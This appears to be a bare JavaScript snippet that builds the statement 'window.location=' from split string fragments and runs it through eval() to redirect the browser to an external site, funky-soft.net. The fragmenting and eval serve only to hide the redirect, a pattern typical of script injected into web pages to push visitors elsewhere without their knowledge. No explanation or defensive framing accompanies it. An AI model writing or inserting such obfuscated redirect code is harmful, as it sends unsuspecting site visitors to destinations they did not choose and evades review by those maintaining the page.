var str1="win";
var str2="dow.";
var str3="locat";
var str4="ion=";
var str5="'http://funky-soft.net'";
eval(str1+str2+str3+str4+str5);
